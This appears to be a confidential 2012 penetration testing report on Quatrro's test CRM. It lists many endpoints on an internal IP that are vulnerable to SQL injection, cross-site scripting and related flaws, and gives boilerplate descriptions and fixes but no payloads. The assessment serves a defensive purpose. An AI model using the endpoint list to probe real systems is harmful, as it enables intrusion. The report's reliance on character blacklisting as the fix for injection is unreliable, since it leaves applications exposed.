Download - Quatrro CRM Pt Report
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 1
Document Details
Company Quatrro
Document Title Penetration Testing Report
Date 28-03-2012
Classification Confidential
Document Type Report
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 2
Table of Contents
Executive Summary 3 Goal 3 Scope 3 Assessment Findings 4 Details 12 Conclusion 22 Recommendation 22
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 3
Executive Summary
We thank you for choosing Appin Software Security Pvt. Ltd. as your Information Security
partner. We appreciate your business and look forward to provide you services in the near
future. The following report presents the results of the application, as per your request. In case
you have any questions, please contact your Appin representative or email
Goal
To provide comprehensive Penetration Testing Report of the Web Application based on
OWASP Top 10 including but not limited to SQL Injection, CRLF Injections, Directory
Traversals, File Inclusion, Buffer Overflow, Cross Site Scripting(XSS), Cross Site Request
Forgery etc. which will help Quatrro to improve the Security level by addressing the
vulnerabilities.
Scope
In depth Security Assessment of the following Web Application:
Web Application Audit Dates
http://10.100.4.50/testcrm/ 26th March
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 4
Assessment Findings
Ref No’s Vulnerability Name Vulnerable URLs Risk Level
1 SQL Injection http://10.100.4.50/testcrm/key_view.php?submit1=Vie
w&status=0
http://10.100.4.50/testcrm/orderdetail_frame.php?srno
=163473
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111
111144
High
2 Cross Site
Scripting
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111
111144
http://10.100.4.50/testcrm/currency_master.php?cid=15
http://10.100.4.50/testcrm/Payment_master.php?pid=1
1
http://10.100.4.50/testcrm/mail_template.php?mtid=16
http://10.100.4.50/testcrm/subcategory.php?action=edi
t&catid=1
High
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 5
http://10.100.4.50/testcrm/newproduct.php?srno=558
http://10.100.4.50/testcrm/system.php?action=edit&ids
ystem=1
http://10.100.4.50/testcrm/component.php?action=edit
&idcomponent=1
http://10.100.4.50/testcrm/incident.php?action=edit&id
incident=1
http://10.100.4.50/testcrm/module.php?action=edit&id
module=1
http://10.100.4.50/testcrm/promocode.php?action=edit
&id=6
http://10.100.4.50/testcrm/origin_of_cust.php?action=e
dit&srno=1
http://10.100.4.50/testcrm/sale_medium.php?action=ed
it&id=1
http://10.100.4.50/testcrm/brand_master.php?action=e
dit&id=1
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 6
http://10.100.4.50/testcrm/disposition_master.php?acti
on=edit&id=1
http://10.100.4.50/testcrm/computer_type.php?action=
edit&code=1
http://10.100.4.50/testcrm/operatingsys.php?action=edi
t&code=2
http://10.100.4.50/testcrm/computer_age.php?action=e
dit&code=1
http://10.100.4.50/testcrm/internet_con.php?action=edi
t&code=3
http://10.100.4.50/testcrm/createdfrom.php?action=edi
t&id=2
http://10.100.4.50/testcrm/subvdnmap_edit.php?accou
nt=91011832&vdn=60250
http://10.100.4.50/testcrm/subvdnmap_edit.php?accou
nt=91011832
http://10.100.4.50/testcrm/reportschdl.php?action=edit
&id=1
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 7
http://10.100.4.50/testcrm/matrixmaster.php?eid=3&ac
c=36321671&plan=200000522&act=1
http://10.100.4.50/testcrm/partnerreportsetting.php?ac
tion=edit&id=14
http://10.100.4.50/testcrm/survey_edit.php?surveyid=6
9C82D9A-0E2E-E011-91D3-001E0BD9CB7C
http://10.100.4.50/testcrm/menu_header.php?action=e
dit&headerid=1
http://10.100.4.50/testcrm/sub_menu.php?action=edit
&idsmenu=1
http://10.100.4.50/testcrm/rolemaster.php?action=edit
&iduserrights=1
http://10.100.4.50/testcrm/business_agent.php?id=1
http://10.100.4.50/testcrm/accountdetails.php?account
=91011832&action=1&aname=AAA
http://10.100.4.50/testcrm/ibmaster.php?ibid=206
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 8
http://10.100.4.50/testcrm/subibmaster.ph?ibid=1
http://10.100.4.50/testcrm/department.php?action=edit
&depid=3
http://10.100.4.50/testcrm/employeemaster.php?eid=1
http://10.100.4.50/testcrm/business_agent.php?id=1
3 Unencrypted
Login Request
http://10.100.4.50/testcrm/login-exec.php Medium
4 Phishing Through
Frames
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111
111144
http://10.100.4.50/testcrm/currency_master.php?cid=15
http://10.100.4.50/testcrm/Payment_master.php?pid=1
1
http://10.100.4.50/testcrm/mail_template.php?mtid=16
http://10.100.4.50/testcrm/subcategory.php?action=edi
t&catid=1
http://10.100.4.50/testcrm/newproduct.php?srno=558
http://10.100.4.50/testcrm/system.php?action=edit&ids
Medium
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 9
ystem=1
http://10.100.4.50/testcrm/component.php?action=edit
&idcomponent=1
http://10.100.4.50/testcrm/incident.php?action=edit&id
incident=1
http://10.100.4.50/testcrm/module.php?action=edit&id
module=1
http://10.100.4.50/testcrm/promocode.php?action=edit
&id=6
http://10.100.4.50/testcrm/origin_of_cust.php?action=e
dit&srno=1
http://10.100.4.50/testcrm/sale_medium.php?action=ed
it&id=1
http://10.100.4.50/testcrm/brand_master.php?action=e
dit&id=1
http://10.100.4.50/testcrm/disposition_master.php?acti
on=edit&id=1
http://10.100.4.50/testcrm/computer_type.php?action=
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 10
edit&code=1
http://10.100.4.50/testcrm/operatingsys.php?action=edi
t&code=2
http://10.100.4.50/testcrm/computer_age.php?action=e
dit&code=1
http://10.100.4.50/testcrm/internet_con.php?action=edi
t&code=3
http://10.100.4.50/testcrm/createdfrom.php?action=edi
t&id=2
http://10.100.4.50/testcrm/subvdnmap_edit.php?accou
nt=91011832&vdn=60250
http://10.100.4.50/testcrm/subvdnmap_edit.php?accou
nt=91011832
http://10.100.4.50/testcrm/reportschdl.php?action=edit
&id=1
http://10.100.4.50/testcrm/matrixmaster.php?eid=3&ac
c=36321671&plan=200000522&act=1
http://10.100.4.50/testcrm/partnerreportsetting.php?ac
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 11
tion=edit&id=14
http://10.100.4.50/testcrm/survey_edit.php?surveyid=6
9C82D9A-0E2E-E011-91D3-001E0BD9CB7C
http://10.100.4.50/testcrm/menu_header.php?action=e
dit&headerid=1
http://10.100.4.50/testcrm/sub_menu.php?action=edit
&idsmenu=1
http://10.100.4.50/testcrm/rolemaster.php?action=edit
&iduserrights=1
http://10.100.4.50/testcrm/business_agent.php?id=1
http://10.100.4.50/testcrm/accountdetails.php?account
=91011832&action=1&aname=AAA
http://10.100.4.50/testcrm/ibmaster.php?ibid=206
http://10.100.4.50/testcrm/subibmaster.ph?ibid=1
http://10.100.4.50/testcrm/department.php?action=edit
&depid=3
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 12
http://10.100.4.50/testcrm/employeemaster.php?eid=1
http://10.100.4.50/testcrm/business_agent.php?id=1
5 Directory Listing
Enabled
http://10.100.4.50/testcrm/template
http://10.100.4.50/testcrm/include
http://10.100.4.50/testcrm/images
Low
Details
http://10.100.4.50/testcrm/
Vulnerability
SQL Injection
Risk
High
Potential Security Issue
It is possible to view, modify or delete database entries and tables
Technical Description
A common way to reduce the risk of being attacked by SQL injection is to supress detailed SQL
error messages, which are usually used by attackers to easily locate scripts that are susceptible
to SQL Injection.
The concept behind blind SQL injection is that it is possible, even without receiving direct data
from the database (in the form of an error message, or leaked information), to extract data from
the database, one bit at a time, or to modify the query in a malicious way. The idea is that the
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 13
application behavior (result identical to the original result, or result different than the original
result) can provide a single bit of information about the evaluated (modified) query, meaning,
it's possible for the attacker to formulate an SQL Boolean expression whose evaluation (single
bit) is compromised in the form of the application behavior (identical/un-identical to the
original behavior).
Fix Recommendations
There are several issues whose remediation lies in sanitizing user input.
By verifying that user input does not contain hazardous characters, it is possible to prevent
malicious users from causing your application to execute unintended operations, such as
launch arbitrary SQL queries, embed Javascript code to be executed on the client side, run
various operating system commands etc.
It is advised to filter out all the following characters:
[1] | (pipe sign)
[2] & (ampersand sign)
[3] ; (semicolon sign)
[4] $ (dollar sign)
[5] % (percent sign)
[6] @ (at sign)
[7] ' (single apostrophe)
[8] " (quotation mark)
[9] \' (backslash-escaped apostrophe)
[10] \" (backslash-escaped quotation mark)
[11] <> (triangular parenthesis)
[12] () (parenthesis)
[13] + (plus sign)
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 14
[14] CR (Carriage return, ASCII 0x0d)
[15] LF (Line feed, ASCII 0x0a)
[16] , (comma sign)
[17] \ (backslash)
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 15
http://10.100.4.50/testcrm/
Vulnerability
Cross Site Scripting
Risk
High
Potential Security Issue
It is possible to steal or manipulate customer session and cookies, which might be used to
impersonate a legitimate user, allowing the hacker to view or alter user records, and to
perform transactions as that user.
Technical Description
The Cross-Site Scripting attack is a privacy violation, that allows an attacker to acquire a
legitimate user's credentials and to impersonate that user when interacting with a specific
website.
The attack hinges on the fact that the web site contains a script that returns a user's input
(usually a parameter value) in an HTML page, without first sanitizing the input. This allows an
input consisting of JavaScript code to be executed by the browser when the script returns this
input in the response page. As a result, it is possible to form links to the site where one of the
parameters consists of malicious JavaScript code. This code will be executed (by a user's
browser) in the site context, granting it access to cookies that the user has for the site, and other
windows in the site through the user's browser.
Possible actions that can be performed by the script are:
[1] Send user's cookies (for the legitimate site) to the attacker.
[2] Send information that is accessible through the DOM (URLs, Form fields, etc.), to the
attacker.
The result is that the security and privacy of the victim user is compromised on the vulnerable
site.
Fix Recommendations
Sanitize user input & filter out JavaScript code. We suggest you filter the following characters:
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 16
[1] <> (triangular parenthesis)
[2] " (quotation mark)
[3] ' (single apostrophe)
[4] % (percent sign)
[5] ; (semicolon)
[6] () (parenthesis)
[7] & (ampersand sign)
[8] + (plus sign)
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 18
http://10.100.4.50/testcrm/
Vulnerability
Unencrypted Login Request
Risk
Medium
Potential Security Issue
It may be possible to steal user login information such as usernames and passwords that are
sent unencrypted.
Technical Description
During the application test, it was detected that an unencrypted login request was sent to the server.
Since some of the input fields used in a login process (for example: usernames, passwords, etc.) are
personal and sensitive, it is recommended that they should be sent to the server over an encrypted
connection.
Fix Recommendations
Make sure that all login requests are sent encrypted to the server (e.g. SSL).
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 19
http://10.100.4.50/testcrm/
Vulnerability
Phishing Through Frames
Risk
Medium
Potential Security Issue
It is possible to persuade a naive user to supply sensitive information such as username,
password, credit card number etc.
Technical Description
It is possible for an attacker to inject a frame or an iframe tag with malicious content which
resembles the attacked site. An incautious user may browse it and not realize that he is leaving
the original site and surfing to a malicious site. The attacker may then lure the user to login
again, thus acquiring his login credentials.
The fact that the fake site is embedded in the original site helps the attacker by giving his
phishing attempts a more reliable appearance.
Fix Recommendations
It is advised to filter out all the following characters:
[1] | (pipe sign)
[2] & (ampersand sign)
[3] ; (semicolon sign)
[4] $ (dollar sign)
[5] % (percent sign)
[6] @ (at sign)
[7] ' (single apostrophe)
[8] " (quotation mark)
[9] \' (backslash-escaped apostrophe)
[10] \" (backslash-escaped quotation mark)
[11] <> (triangular parenthesis)
[12] () (parenthesis)
[13] + (plus sign)
[14] CR (Carriage return, ASCII 0x0d)
[15] LF (Line feed, ASCII 0x0a)
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 20
[16] , (comma sign)
[17] \ (backslash)
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 21
http://10.100.4.50/testcrm/
Vulnerability
Directory Listing Enabled
Risk
Low
Potential Security Issue
It is possible to view and download the contents of certain web application virtual directories,
which might contain restricted files.
Technical Description
If the web server was configured improperly, it is possible to retrieve a directory listing by
sending a request for a specific directory, rather than for a file.
Fix Recommendations
[1] Configure the web server to deny listing of directories.
[2] Download a specific security patch according to the issue existing on your web server or
web application.
CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 22
Conclusion
On the basis of penetration testing carried out on your web application it can be
concluded that web application does contain vulnerabilities.
Recommendation
High & Medium Level vulnerabilities should be patched on priority.